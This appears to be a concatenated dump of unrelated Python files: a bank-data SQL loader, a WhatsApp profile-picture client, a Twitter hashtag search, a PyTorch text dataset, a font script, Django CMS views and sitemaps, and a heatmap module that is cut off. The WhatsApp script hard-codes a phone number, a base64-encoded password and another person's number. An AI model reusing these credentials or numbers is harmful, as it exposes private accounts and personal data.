        existing_banks = sql_service.fetch_data('bank', ['name', 'country_id'], cur)
        print('banks=', len(banks))
        print('existingBanks=', len(existing_banks))
        data_to_insert = sql_service.remove_duplicate_data(existing_banks, banks[['name', 'country_id']])
        print('dataToInsert=', len(data_to_insert))
        sql_service.bulk_insert('bank', data_to_insert.columns.tolist(), data_to_insert.values.tolist(), cur)
        print("Inserting bank metadata for %s.........................................................." %
              country['name'].values[0])
        insert_bank_metadata(banks, countryCode, cur)
        print("--------------------Insertion Complete--------------------")
    cur.execute('END;')
    cur.close()
    conn.close()
    return
def insert_branch_metadata(branch_info, cur):
    """Insert JSON metadata rows for branches missing from branch_metadata.

    Joins `branch_info` against the existing bank_branch table to resolve
    branch ids, then bulk-inserts only the rows not already present.
    """
    branches = sql_service.fetch_data('bank_branch', ['id', 'name', 'bank_id'], cur)
    branches.columns = ['branch_id', 'name', 'bank_id']
    existing_data = sql_service.fetch_data('branch_metadata', ['data', 'branch_id', 'company_id'], cur)
    # Diagnostic prints: the two merge orders should agree on row count.
    print("existingData=", len(existing_data))
    print("branchInfo=", len(branch_info))
    print("branches=", len(branches))
    print("afterMerge=", len(pd.merge(branch_info, branches)))
    print("anotherMerge=", len(branches.merge(branch_info)))
    insert_data = pd.DataFrame(prepare_branch_metadata(pd.merge(branch_info, branches)))
    print("insertData=", len(insert_data))
    data_to_insert = sql_service.remove_duplicate_data(existing_data, insert_data)
    print("dataToInsert=", len(data_to_insert))
    sql_service.bulk_insert('branch_metadata', data_to_insert.columns.tolist(), data_to_insert.values.tolist(), cur)
    return
def insert_bank_branch(sheets):
    """Insert bank branches (and their metadata) for every country sheet.

    `sheets` maps a three-char country code to rows with 'name' and
    'bank_name' columns; branches are joined to existing banks by bank_name.
    """
    conn = connect()
    cur = conn.cursor()
    banks = sql_service.fetch_data('bank', ['id', 'name', 'country_id'], cur)
    banks.columns = ['bank_id', 'bank_name', 'country_id']
    countries = sql_service.fetch_data('country', ['id', 'name', 'three_char_code'], cur)
    for countryCode in sheets.keys():
        try:
            country = sql_service.fetch_country_by_code(countries, countryCode)
        except IndexError as e:
            print("--------------------Country not found--------------------")
            print("--------------------Aborting insert for %s--------------------" % countryCode)
            continue
        print(
            "Inserting banks for %s.........................................................." % country['name'].values[
                0])
        branch_info = pd.DataFrame(sheets[countryCode])
        branch_info['name'] = pd.Series(branch_info['name']).str.title()
        branch_info['bank_name'] = pd.Series(branch_info['bank_name']).str.title()
        # BUG FIX: drop_duplicates() returns a copy; the original discarded
        # it, so duplicate branch names were inserted anyway.
        branch_info = branch_info.drop_duplicates(subset=['name']).reset_index(drop=True)
        branch_info['country_id'] = country['id'].values[0]
        print("branchInfo=", len(branch_info))
        print(branch_info[:2], banks[:2])
        branch_info = banks.merge(branch_info)
        print("branchInfo=", len(branch_info))
        insert_data = prepare_bank_branch(branch_info)
        existing_data = sql_service.fetch_data('bank_branch', ['name', 'bank_id', 'payment_type_code'], cur)
        data_to_insert = sql_service.remove_duplicate_data(existing_data, insert_data)
        print("insertData=", len(insert_data))
        print('existingData=', len(existing_data))
        print('dataToInsert=', len(data_to_insert))
        print("Inserting branch metadata for %s.........................................................." %
              country['name'].values[0])
        sql_service.bulk_insert('bank_branch', data_to_insert.columns.tolist(), data_to_insert.values.tolist(), cur)
        insert_branch_metadata(branch_info, cur)
        print("--------------------Insertion Complete--------------------")
    cur.execute('END;')
    cur.close()
    conn.close()
    return
|
23,559 | 413cdd2f98f047fb2bdf626cf87c628a30d7913d | import os
parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
os.sys.path.insert(0,parentdir)
import time, base64
from Yowsup.connectionmanager import YowsupConnectionManager
class WhatsappProfileClient:
    """Minimal Yowsup client that logs in and fetches a contact's profile picture.

    Signal callbacks flip `self.done`, which login() busy-waits on.
    """
    def __init__(self, phone_number):
        connectionManager = YowsupConnectionManager()
        self.signalsInterface = connectionManager.getSignalsInterface()
        self.methodsInterface = connectionManager.getMethodsInterface()
        self.signalsInterface.registerListener("auth_success", self.onAuthSuccess)
        self.signalsInterface.registerListener("auth_fail", self.onAuthFailed)
        self.signalsInterface.registerListener("disconnected", self.onDisconnected)
        # self.signalsInterface.registerListener("profile_setPictureSuccess", self.onSetProfilePicture)
        # self.signalsInterface.registerListener("profile_setPictureError", self.onSetProfilePictureError)
        self.signalsInterface.registerListener("contact_gotProfilePicture", self.onGotProfilePicture)
        # self.signalsInterface.registerListener("profile_setStatusSuccess", self.onSetStatusSuccess)
        self.phone_number = phone_number
        self.done = False
    def login(self, username, password):
        """Authenticate, then block (polling twice a second) until a callback sets done."""
        self.username = username
        self.methodsInterface.call("auth_login", (username, password))
        while not self.done:
            time.sleep(0.5)
    def onAuthFailed(self, username, err):
        print("Auth Failed!")
    def onDisconnected(self, reason):
        print("Disconnected because %s" %reason)
    def onSetProfilePictureError(self, errorCode):
        # BUG FIX: the original format string had no placeholder
        # ("Fail to set pic: " % errorCode), which raises TypeError at runtime.
        print("Fail to set pic: %s" % errorCode)
        self.done = True
    def onGotProfilePicture(self, filePath):
        print("Got the profile pic %s" %filePath)
        self.done = True
    def onSetProfilePicture(self):
        print("GETTING MY PICTURE")
        self.done = True
    def onSetStatusSuccess(self, jId, messageId):
        print("Set the status")
        self.done = True
    def onAuthSuccess(self, username):
        """Kick off the profile-picture request once authenticated."""
        print("Authed %s" % username)
        self.methodsInterface.call("contact_getProfilePicture", (self.phone_number,))
        # self.methodsInterface.call("profile_setPicture",('logo.jpg',))
        # self.done = True
# SECURITY(review): hard-coded phone number and base64-encoded password are
# committed to source — rotate these credentials and load them from the
# environment or a secrets store instead.
login = "254733171036"
password = "+rYGoEyk7y9QBGLCSHuPS2VVZNw="
password = base64.b64decode(bytes(password.encode('utf-8')))
# Fetch the profile picture of the target number, blocking until a callback fires.
wa = WhatsappProfileClient("61450212500")
wa.login(login, password)
|
23,560 | 22edb00a1b0f57e58a1bf3551990ce889aadea32 | import tweepy
import twappconfig as tw
from tweepy import OAuthHandler
import json
# Authenticate against the Twitter API with app credentials from twappconfig.
auth = OAuthHandler(tw.ckey,tw.csecret)
auth.set_access_token(tw.akey,tw.asecret)
api = tweepy.API(auth)
count=0
# Pull the 10 most recent English #modi tweets and print their hashtag entities.
for tweet in tweepy.Cursor(api.search,q="#modi",rpp=1,result_type="recent",include_entities=True,lang="en").items(10):
    count+=1
    for ele in tweet.entities['hashtags']:
        print(ele)
    print("\n")
|
23,561 | 135da78f16a11344e2764568fa22955259edeb84 | import io
import numpy as np
#from torchtext import data
from collections import defaultdict
from torch.utils.data import Dataset, DataLoader
import torch
import random
"""
PTBCDataset
Input:
dataType: Please choose among "train", "valid", "test"
ixToword: If there exists text <-> textual id dictionary, put it here
wordToix: If there exists text <-> textual id dictionary, put it here
    THRESHOLD: Default is 5. A character is added to the dictionary only when it appears more times than the threshold.
Output:
None
Description:
This dataset uses following preprocessing strategy
<pad> : To make all tensors have equal size (Not used but just in case. April 8, 2020)
<bos> : Beginning of the sentence
<eos> : End of the sentence
<unk> : For unknown characters
_ : Whitespace
<mask> : Mask
"""
class PTBCDataset(Dataset):
    """Character-level Penn Treebank dataset with random word masking.

    Vocabulary ids come from 'dicts.txt'; the id layout is
    0:<pad> 1:<bos> 2:<eos> 3:<unk> 4:_ 5:<mask>, then characters.
    __getitem__ returns (masked_ids, original_ids) pairs.
    """
    # Paths to the three PTB character splits, indexed by loadData().
    urls = ['data/pennchar/train.txt',
            'data/pennchar/valid.txt',
            'data/pennchar/test.txt']
    def __init__(self, dataType, ixtoword=None, wordtoix=None, minSeq = 16, maxSeq = 128, THRESHOLD=5):
        # dataType: 'train' | 'valid' | 'test' (selects a path in `urls`).
        self.minSeq = minSeq
        self.maxLen = maxSeq
        self.data = self.loadData(dataType)
        # NOTE(review): THRESHOLD is stored but never used inside this class.
        self.threshhold = THRESHOLD
        self.wordtoix, self.ixtoword = wordtoix, ixtoword
        self.textual_ids = self.build_dictionary()
        self.padded_ids = None
        self.vocab_size = len(self.wordtoix)
        print("Sample Data Loaded")
        print(self.data[124])
        # print("Coverted into textual_ids")
        print("0: <pad>, 1: <bos>, 2: <eos>, 3: <unk>, 4: _, 5: <mask>, 6~:abcd...z + special")
        # print(self.textual_ids[124])
        print("Start Padding to make every data have same length")
        self.padded_ids = [self.pad_sequences(x, self.maxLen) for x in self.textual_ids]
        print(self.padded_ids[124])
    def getMaxLength(self, list):
        # Longest sequence length, rounded up by adjustMaxSize.
        # NOTE(review): the parameter name shadows the builtin `list`.
        result = max(len(t) for t in list)
        result = self.adjustMaxSize(result)
        return result
    ''' Torch size follows: (3n + 4) * 16 where n equals digits from system argument '''
    def adjustMaxSize(self, a):
        # Round `a` up to the next value with a % 16 == 0 and
        # (a/16 - 4) % 3 == 0 (tensor-size constraint noted above).
        if a % 16 == 0 and (a /16 - 4)%3 == 0:
            pass
        else:
            while (a % 16 != 0 or (a /16 - 4)%3 != 0):
                a +=1
        return a
    def pad_sequences(self, x, max_len):
        # Right-pad (or truncate) `x` to exactly max_len int64 ids; 0 == <pad>.
        padded = np.zeros((max_len), dtype=np.int64)
        if len(x) > max_len: padded[:] = x[:max_len]
        else: padded[:len(x)] = x
        return padded
    def build_dictionary(self):
        """ Add to dictionary """
        freqDict = defaultdict(int)
        wordDict = defaultdict(str)
        ixtoword = defaultdict(int)
        #{'<pad>':0, '<bos>':1, '<eos>':2, '<unk>': 3, '_':4, 'mask': 5}
        # Each line i of dicts.txt lists the token spellings for id i; the
        # first token on the line is the canonical spelling.
        with io.open('dicts.txt', encoding='UTF-8') as f:
            for i, line in enumerate(f):
                for c in line.split(' '):
                    wordDict[c.rstrip('\n')] = i
                ixtoword[i] = line.split(' ')[0].rstrip('\n')
        """ Build text <-> textual id Dictionary """
        if self.ixtoword == None or self.wordtoix == None:
            self.wordtoix = wordDict
            # NOTE(review): this enumerates wordDict's insertion order, which
            # matches the ids above only when every line holds one token.
            self.ixtoword = {i: word for i, word in enumerate(wordDict)}
        """
        Convert full text into textual ids
        Addes <bos> and <eos> at the beginning and the end of the sentence respectively
        Description:
            textual_ids:
                [ ['<bos>', 'a', 'b', 'c', '<eos>'],
                ['<bos>', 'a', 'b', 'c', '<eos>'] ]
            vectorized_ids:
                [ '<bos>', 'a', 'b', 'c', '<eos>', '<bos>', 'a', 'b', 'c', <eos> ]
        """
        textual_ids = list()
        for i in range(0, len(self.data)):
            temp = list()
            temp.append(self.wordtoix.get('<bos>'))
            for word in self.data[i]:
                if word in self.wordtoix:
                    temp.append(self.wordtoix.get(word))
                else:
                    # NOTE(review): unknown tokens fall back to '<etc>', but
                    # the class docs describe '<unk>' — confirm which key
                    # dicts.txt actually defines.
                    temp.append(self.wordtoix.get('<etc>'))
            temp.append(self.wordtoix.get('<eos>'))
            textual_ids.append(temp)
        return textual_ids
    def loadData(self, dataType):
        """ Load path of text file """
        if dataType == "train":
            f = self.urls[0]
        elif dataType == "valid":
            f = self.urls[1]
        elif dataType == "test":
            f = self.urls[2]
        """ Load text file """
        # Keep only lines whose raw character count lies in (minSeq, maxLen).
        corpus = list()
        with io.open(f, encoding='UTF-8') as f:
            for line in f:
                if len(line) > self.minSeq and len(line) < self.maxLen:
                    corpus.append(line.lstrip().rstrip().split(' '))
        return corpus
    def onehot_encoder(self, idxs):
        # One-hot (maxLen, vocab_size) float32 matrix for a padded id sequence.
        vec = np.zeros([self.maxLen, self.vocab_size], dtype=np.float32)
        for i, id in enumerate(idxs):
            vec[i, id] = 1
        return vec
    def __getitem__(self, index):
        # Returns (masked_ids, original_ids) for one padded sequence.
        x = self.padded_ids[index]
        # x = np.asarray(x, dtype=np.float32)
        masked, target = self.splitWithMask(x)
        #target = self.pad_sequences(target, masked.shape[0])
        #masked = self.onehot_encoder(masked)
        # target = self.onehot_encoder(target)
        return masked, target
    def __len__(self):
        # textual_ids and padded_ids are built one-to-one, so this length
        # matches the number of retrievable items.
        return len(self.textual_ids)
    ############################################
    # Mask Random Words
    ############################################
    def splitWithMask(self, idxs):
        """Mask one randomly chosen whitespace-delimited word in `idxs`.

        Returns (masked_copy, original); single-word sequences are returned
        unmasked.
        """
        whiteSpaceList = list()
        eosIdx = None
        masked = np.asarray([i for i in idxs])
        for i, v in enumerate(idxs):
            if v == self.wordtoix.get('_'):
                whiteSpaceList.append(i)
            if v == self.wordtoix.get('<eos>'):
                eosIdx = i
        # If there are more than two words
        # ex: [4, 10, 19, 24, 27, eosIdx]
        if len(whiteSpaceList) > 0:
            whiteSpaceList.append(eosIdx)
            startIdx = random.randint(0, len(whiteSpaceList)-2)
            endIdx = startIdx + 1
            masked[whiteSpaceList[startIdx]+1: whiteSpaceList[endIdx]] = self.wordtoix.get('<mask>')
            return masked, idxs
        # If there is one word, return original text. eg) Hello
        else:
            return idxs, idxs
if __name__ == '__main__':
    # Smoke test: load the training split, fetch one item, build a loader.
    dataset = PTBCDataset('train') # Use among 'train', 'valid', 'test'
    dataset.__getitem__(124)
    loader = DataLoader(dataset, batch_size=4)
    print(dataset.wordtoix)
23,562 | c700fb0c1b409d06d1872c0a2159dd25a90958e3 | #!/usr/bin/python3
from fontParts.world import *
import sys
# Usage: <script> <font.ufo> — decomposes every glyph's components in place.
# Open UFO
ufo = sys.argv[1]
font = OpenFont(ufo)
# Modify UFO
## Decompose all glyphs
for glyph in font:
    glyph.decompose()
# Save UFO
# Mark the font dirty, write it back to disk, and release it.
font.changed()
font.save()
font.close()
23,563 | 7c337d579a8fe81e8da690a2ef4807cb7949540f | # pages / views.py
import logging
from django.conf import settings
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.shortcuts import render_to_response, redirect
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
from django.core.cache import cache
from django.views.decorators.cache import cache_page
from django.contrib import messages
from django.contrib.syndication.views import Feed
from django.utils.feedgenerator import Rss201rev2Feed
from django.template.defaultfilters import truncatewords, striptags, slugify
import django.contrib.sitemaps.views as sitemap_views
from pages.sitemap import WebsiteSitemap
from modules.models import Module, Article
from modules.templatetags.module_filters import article_page_url, str_to_datetime
from pages.models import Page
from pages.forms import PageForm
from cms.utils import purge_varnish
def render(request):
    #import pdb; pdb.set_trace()
    """ Render page of a website. """
    if not request.website:
        return HttpResponse('No CMS found. :-(')
    (page, parameters) = request.website.get_current_page(request.path)
    if not page:
        raise Http404
    editor = None
    edit_mode = False
    context = RequestContext(request)
    if request.user.is_authenticated():
        editor = page.get_editor()
        if not editor:
            # Claim the edit lock for this user/session, drop any leftover
            # unpublished scratch modules, and seed fresh temporary copies
            # of the published modules to edit.
            editor = page.set_editor(request.user, request.COOKIES['sessionid'])
            page.modules.filter(parent=None, is_published=False, is_deleted=False).all().delete()
            modules = list(page.get_published_modules())
            for module in modules:
                module.create_temporary_module(context)
        if editor and editor.user.id == request.user.id:
            # Current user holds the lock: serve the editable temporary modules.
            edit_mode = True
            modules = list(page.get_temporary_modules())
        else:
            modules = list(page.get_published_modules())
    # NOTE(review): anonymous requests never assign `modules`, so this return
    # raises UnboundLocalError — an `else` on the is_authenticated() branch
    # appears to be missing. Confirm against production behavior.
    return render_to_response(page.get_template(),
                              {'page': page, 'parameters': parameters, 'edit_mode': edit_mode, 'editor': editor,
                               'modules': modules}, context)
def status(request):
    """Health check for Varnish server"""
    # NOTE(review): the response text has a typo ("healty") — left unchanged
    # in case an external monitor string-matches the body.
    return HttpResponse('Hi, I am healty!')
@login_required
def add(request, page_id=None):
    """
    Adds and Edits a page of a website.

    Returns 'locked' when another user holds the edit lock, redirects to the
    page list after a successful save, and otherwise renders the site's own
    add/edit form template (falling back to the generic one).
    """
    context = RequestContext(request)
    if page_id:
        page = Page.objects.get(pk=page_id)
        editor = page.get_editor()
        if editor and editor.user.id != request.user.id:
            # msg = 'You can\'t edit this page because %s is updating it now' % (
            # str(request.user.email)
            # )
            # messages.add(request, msg)
            return HttpResponse('locked')
    else:
        page = None
    if request.method == 'POST':
        submitted_data = request.POST.copy()
        submitted_data['website'] = request.website.id
        # NOTE(review): request.POST['id'] raises KeyError if the form omits
        # the field — presumably the form always posts it; verify.
        if request.POST['id']:
            page = Page.objects.get(pk=request.POST['id'], website=request.website)
        form = PageForm(website=request.website, data=submitted_data, instance=page)
        if form.is_valid():
            form.save()
            if page:
                page.clear_cache(context)
            cache.delete('%s_%s_pages' % (request.website.subdomain, str(request.website.id)))
            return redirect("/editor/page/list")
        # An invalid form falls through and re-renders with errors.
    else:
        form = PageForm(website=request.website, instance=page)
    # Prefer the website's custom form template; fall back to the generic one.
    try :
        return render_to_response('websites/%s/forms/add-edit-form.html' % (request.website.subdomain),{'page': page, 'form': form}, context)
    except :
        return render_to_response("pages/add-edit-form.html", {'page': page, 'form': form}, context)
@login_required
def delete(request, page_id):
    """Delete a page (unless it is locked by another editor).

    Returns a plain-text body the AJAX caller inspects: 'true' on success,
    'locked' when another user holds the edit lock, or an error sentence.
    """
    page = Page.objects.get(pk=page_id)
    if not page:
        return HttpResponse("Sorry! Your requested page doesn't exist.")
    try:
        editor = page.get_editor()
        if editor and editor.user.id != request.user.id:
            return HttpResponse('locked')
        page.delete()
        # Invalidate the per-website page list cache.
        cache.delete('%s_%s_pages' % (request.website.subdomain, str(request.website.id)))
        messages.success(request, '%s has been deleted successfully.' % page.title)
        return HttpResponse("true")
    except:
        return HttpResponse("There is some Problem Appear . Please Try again Later")
@login_required
def list_pages(request):
    """Render the management list of every page on the current website."""
    return render_to_response(
        "pages/list_pages.html",
        {"pages": request.website.get_pages()},
        RequestContext(request))
@login_required
def publish(request):
    """Publish the pending changes of the page named in POST['page_route'].

    Returns the literal string 'true' on success or 'error' on failure;
    the AJAX caller keys off these exact bodies.
    """
    context = RequestContext(request)
    page = Page.objects.get(website=request.website, url=request.POST['page_route'])
    try:
        page.publish(context)
        page.clear_cache(context)
        purge_varnish(request)
    except Exception:
        # BUG FIX: the original re-raised here, which made the
        # `return HttpResponse('error')` below unreachable and turned every
        # publish failure into a 500 instead of the 'error' sentinel the
        # caller expects.
        return HttpResponse('error')
    messages.success(request, 'Your changes have been published successfully.')
    return HttpResponse('true')
@login_required
def force_edit(request, page_id):
    """Forcefully release the edit lock on a page and clear its cache.

    Redirects back to the referring page afterwards.  (The original
    docstring said "Deletes page from a website", a copy-paste error.)
    """
    context = RequestContext(request)
    # The original wrapped this lookup in `try/except Exception, e: raise e`,
    # a no-op that only obscured the traceback; let DoesNotExist propagate.
    page = Page.objects.get(pk=page_id)
    page.clear_editor()
    page.clear_cache(context)
    # NOTE(review): HTTP_REFERER may be absent (KeyError) for direct hits.
    return HttpResponseRedirect(request.META['HTTP_REFERER'])
def robots(request):
    """Serve the per-website robots.txt template as plain text."""
    return render_to_response(
        'websites/%s/partials/robots.txt' % request.website.subdomain,
        RequestContext(request), mimetype="text/plain")
def show_404(request):
    """Render the website-specific 404 layout."""
    return render_to_response(
        'websites/%s/layouts/404.html' % request.website.subdomain,
        RequestContext(request))
def show_500(request):
    """Render the website-specific 500 layout."""
    return render_to_response(
        'websites/%s/layouts/500.html' % request.website.subdomain,
        RequestContext(request))
def google_code(request, code):
    """Serve the Google site-verification file; 404 when no template exists."""
    context = RequestContext(request)
    name = 'websites/%s/partials/google%s.html' % (request.website.subdomain, code)
    try:
        return render_to_response(name, context, mimetype="text/plain")
    except:
        # Any template error means this site has no such verification file.
        raise Http404
def live_search_code(request):
    """Serve the Windows Live Search site-verification XML; 404 if missing."""
    context = RequestContext(request)
    name = 'websites/%s/partials/LiveSearchSiteAuth.xml' % (request.website.subdomain)
    try:
        return render_to_response(name, context, mimetype="application/xml")
    except:
        raise Http404
def bing_code(request):
    """Serve the Bing site-verification XML; 404 if this site has none."""
    context = RequestContext(request)
    name = 'websites/%s/partials/BingSiteAuth.xml' % (request.website.subdomain)
    try:
        return render_to_response(name, context, mimetype="application/xml")
    except:
        raise Http404
def yahoo_code(request, code):
    """Serve the Yahoo site-verification key file; 404 if missing."""
    context = RequestContext(request)
    name = 'websites/%s/partials/y_key_%s.html' % (request.website.subdomain, code)
    try:
        return render_to_response(name, context, mimetype="text/plain")
    except:
        raise Http404
def rss(request):
    """Build the site's RSS 2.0 feed from every published editors-picks module.

    Iterates every page of the current website, collects the articles of its
    published 'editors-picks' modules (newest first) and emits them as feed
    items.  The original wrapped the loop in
    `try/except Exception, e: raise e` — a no-op (Python-2-only) wrapper
    that has been removed; exceptions still propagate exactly as before.
    The unused RequestContext local was dropped as well.
    """
    feed = Rss201rev2Feed(title='%s - Latest News' % request.website.name,
                          link=u'http://%s' % request.get_host(),
                          feed_url=request.build_absolute_uri(),
                          description=u''
                          )
    pages = Page.objects.filter(website=request.website).all()
    for page in pages:
        modules = page.modules.filter(is_published=True, module_type='editors-picks').all()
        for module in modules:
            for article in module.articles.order_by('-updated_at').all():
                feed.add_item(title=article.title,
                              link='http://%s%s' % (request.get_host(), article_page_url(module, article)),
                              description=truncatewords(striptags(article.description), 50),
                              pubdate=article.updated_at
                              )
    return HttpResponse(feed.writeString('UTF-8'), mimetype='application/rss+xml')
@cache_page(1 * 60 * 60)
def sitemap(request, subdomain):
    """Full sitemap for one website (cached for 1 hour).

    Builds a request-scoped WebsiteSitemap subclass (it closes over
    `request`) and delegates rendering to Django's sitemap view using the
    website-specific template.
    """
    class NewsSitemap(WebsiteSitemap):
        subdomain = request.website.subdomain
        def items(self):
            """Collect sitemap entries: static pages, module articles, images.

            Everything appended to self.all_pages must carry a `.location`
            attribute (set here or inside get_article_list).
            """
            pages = Page.objects.filter(website_id=request.website.id).all()
            for page in pages:
                # Pages whose URL still contains a routing placeholder
                # (:articleId etc.) are templates, not concrete URLs — skip
                # them as direct entries but still harvest their modules.
                if page.url.find(':articleId') == -1 and\
                page.url.find(':topicId') == -1 and\
                page.url.find(':imageId') == -1 and\
                page.url.find(':category') == -1:
                    page.location = page.url
                    self.all_pages.append(page)
                # Editor's Picks Module
                editorpicks_module = Module.objects.filter(page_id=page.id, module_type='editors-picks',
                                                           is_deleted=False,
                                                           is_published=True)
                if editorpicks_module:
                    for module in editorpicks_module:
                        # Modules with no landing URL cannot produce links.
                        if module.link_to == '':
                            continue
                        articles = module.get_editors_picks_articles()
                        if articles == None:
                            continue
                        self.get_article_list(module, articles)
                # Article List Module
                article_list_module = Module.objects.filter(page_id=page.id, module_type='article-list',
                                                            is_deleted=False,
                                                            is_published=True)
                if article_list_module:
                    # Minimal fake template context expected by
                    # render_article_list (only these two keys are read).
                    context = {}
                    context['request'] = request
                    context['parameters'] = None
                    for module in article_list_module:
                        # Parameterised modules depend on the URL, so their
                        # article set is not enumerable here.
                        if module.url_parameter != '':
                            continue
                        if module.link_to == '':
                            continue
                        # Force a fresh render instead of the cached fragment.
                        module.is_cached = False
                        articles = module.render_article_list(context, None, False)
                        if articles == None:
                            continue
                        self.get_article_list(module, articles)
                # Featured Article List Modules
                featured_article_list_module = Module.objects.filter(page_id=page.id,
                                                                     module_type='featured-article-list', is_deleted=False,
                                                                     is_published=True)
                if featured_article_list_module:
                    context = {}
                    context['request'] = request
                    context['parameters'] = None
                    for module in featured_article_list_module:
                        # Featured lists nest their article lists one level
                        # down, in sub_modules.
                        sub_modules = list(module.sub_modules.all())
                        for smodule in sub_modules:
                            if smodule.url_parameter != '':
                                continue
                            if smodule.link_to == '':
                                continue
                            smodule.is_cached = False
                            articles = smodule.render_article_list(context, None, False)
                            if articles == None:
                                continue
                            self.get_article_list(smodule, articles)
                # Image Gallery Modules
                image_gallery_modules = Module.objects.filter(page_id=page.id, module_type='image-gallery',
                                                              is_deleted=False,
                                                              is_published=True)
                if image_gallery_modules:
                    for module in image_gallery_modules:
                        images = module.images.all()
                        for image in images:
                            # Images without a GUID have no stable URL.
                            if not image.guid:
                                continue
                            link = page.url.replace(":imageId", image.guid)
                            image.location = link
                            self.all_pages.append(image)
            return self.all_pages
    sitemaps = {
        "website": NewsSitemap
    }
    return sitemap_views.sitemap(request, sitemaps, None, 'websites/' + subdomain + '/sitemaps/sitemap.html')
@cache_page(1 * 60 * 60)
def latestnews(request, subdomain):
    """Google-News-style "latest news" sitemap (cached for 1 hour).

    Same module walk as sitemap() but without the static-page and
    image-gallery entries: only article links are collected.
    """
    class LatestNews(WebsiteSitemap):
        subdomain = request.website.subdomain
        def items(self):
            """Collect article entries from every published list module."""
            pages = Page.objects.filter(website_id=request.website.id).all()
            for page in pages:
                # Editor's Picks Module
                editorpicks_module = Module.objects.filter(page_id=page.id, module_type='editors-picks',
                                                           is_deleted=False,
                                                           is_published=True)
                if editorpicks_module:
                    for module in editorpicks_module:
                        # Modules without a landing URL cannot produce links.
                        if module.link_to == '':
                            continue
                        articles = module.get_editors_picks_articles()
                        if articles == None:
                            continue
                        self.get_article_list(module, articles)
                # Article List Module
                article_list_module = Module.objects.filter(page_id=page.id, module_type='article-list',
                                                            is_deleted=False,
                                                            is_published=True)
                if article_list_module:
                    # Minimal fake template context for render_article_list.
                    context = {}
                    context['request'] = request
                    context['parameters'] = None
                    for module in article_list_module:
                        # URL-parameterised modules are skipped: their article
                        # set depends on the request URL.
                        if module.url_parameter != '':
                            continue
                        if module.link_to == '':
                            continue
                        # Force a fresh render instead of the cached fragment.
                        module.is_cached = False
                        articles = module.render_article_list(context, None, False)
                        if articles == None:
                            continue
                        self.get_article_list(module, articles)
                # Featured Article List Modules
                featured_article_list_module = Module.objects.filter(page_id=page.id,
                                                                     module_type='featured-article-list', is_deleted=False,
                                                                     is_published=True)
                if featured_article_list_module:
                    context = {}
                    context['request'] = request
                    context['parameters'] = None
                    for module in featured_article_list_module:
                        # Featured lists nest their lists in sub_modules.
                        sub_modules = list(module.sub_modules.all())
                        for smodule in sub_modules:
                            if smodule.url_parameter != '':
                                continue
                            if smodule.link_to == '':
                                continue
                            smodule.is_cached = False
                            articles = smodule.render_article_list(context, None, False)
                            if articles == None:
                                continue
                            self.get_article_list(smodule, articles)
            return self.all_pages
    sitemaps = {
        "website": LatestNews
    }
    return sitemap_views.sitemap(request, sitemaps, None, 'websites/' + subdomain + '/sitemaps/latestnews.html')
# EditorPick's Sitemap
@cache_page(1 * 60 * 60)
def editorspicks(request, subdomain):
    """Sitemap listing every published article at its canonical news URL
    (cached for 1 hour)."""
    class EditorPicksSitemap(WebsiteSitemap):
        subdomain = request.website.subdomain
        def items(self):
            """Build one entry per published article that has a GUID."""
            url_format = '/newsarticle/:articleId/:articleTitle'
            published = Article.objects.filter(website_id=request.website.id, is_published=True).all()
            for article in published:
                # Articles without a GUID have no stable URL; skip them.
                if not article.guid:
                    continue
                article.location = (url_format
                                    .replace(":articleId", article.guid)
                                    .replace(":articleTitle", slugify(article.title)))
                self.all_pages.append(article)
            return self.all_pages
    return sitemap_views.sitemap(request, {"website": EditorPicksSitemap}, None,
                                 'websites/' + subdomain + '/sitemaps/editorpicks.html')
|
23,564 | b272b807c601d048f28e536541cf5bd25b4e3a96 | import torch
import numpy as np
DEFAULT_HEIGHT = 128
DEFAULT_WIDTH = 128

device = torch.device("cuda" if torch.cuda.is_available() else "cpu")

# Normalised coordinate grid in [0, 1], shape (1, 2, H, W):
# channel 0 holds the row coordinate i / (H - 1), channel 1 the column
# coordinate j / (W - 1).  Built with two broadcast vectors instead of the
# original O(H*W) Python double loop — same values, much faster import.
_rows = torch.arange(DEFAULT_HEIGHT, dtype=torch.float32) / (DEFAULT_HEIGHT - 1.)
_cols = torch.arange(DEFAULT_WIDTH, dtype=torch.float32) / (DEFAULT_WIDTH - 1.)
coord = torch.stack((
    _rows.unsqueeze(1).expand(DEFAULT_HEIGHT, DEFAULT_WIDTH),
    _cols.unsqueeze(0).expand(DEFAULT_HEIGHT, DEFAULT_WIDTH),
)).unsqueeze(0)
coord = coord.to(device)
def decode(delta_params, curr_params):
    """
    Transition: apply an action (parameter delta) and redraw the canvas.

    :param delta_params: action, i.e. delta parameters, shape = (N, frameskip (1) * action_dim (2))
    :param curr_params: current parameters broadcast over the image plane,
        shape = (N, 2, 128, 128).  Every spatial position holds the same
        (centre_x, centre_y) pair, so [:, :, 0, 0] recovers the (N, 2) values.
        (The original docstring described a non-existent `partial_state`
        argument; corrected here.)
    :return: (normalized_next_canvas, next_params)
        - normalized_next_canvas: float canvas in [0, 1], shape (N, 3, 128, 128)
        - next_params: shape (N, 2, 128, 128)
    """
    # Broadcast the (N, 2) delta over the spatial plane so it can be added
    # to the (N, 2, 128, 128) parameter tensor.
    expanded_x = delta_params.unsqueeze(-1).unsqueeze(-1).expand_as(curr_params)
    next_params = curr_params + expanded_x  # shape = (N, 2, 128, 128)
    # Only one (centre_x, centre_y) pair per sample is needed to redraw.
    next_canvas, _, __ = generate_quadratic_heatmap(next_params[:, :, 0, 0])  # shape = (N, 128, 128, 3)
    # NOTE(review): this reshape reinterprets NHWC memory instead of
    # permuting axes, so the spatial layout is scrambled relative to a true
    # NCHW conversion — probably wants .permute(0, 3, 1, 2); TODO confirm
    # downstream consumers don't rely on the scrambled layout.
    next_canvas = next_canvas.reshape(-1, 3, DEFAULT_HEIGHT, DEFAULT_WIDTH)
    # Map uint8 [0, 255] to float [0, 1].
    normalized_next_canvas = next_canvas.float() / 255.0
    return normalized_next_canvas, next_params
def generate_quadratic_heatmap(batch_parameters, img_height=DEFAULT_HEIGHT, img_width=DEFAULT_WIDTH, return_params=False):
    """
    Generate a batch of quadratic heatmaps z = (x - centre_x)^2 + (y - centre_y)^2
    over the module-level normalised coordinate grid `coord`.

    :param batch_parameters: shape = (N, 2). Batched (centre_x, centre_y);
        centres are expected in the same normalised [0, 1] space as `coord`.
    :param img_height: integer
    :param img_width: integer
    :param return_params: boolean, whether or not to also return the centres
    :return: a 3-tuple (arr, centre_x, centre_y) — the original docstring
        claimed a single unbatched array, which was wrong:
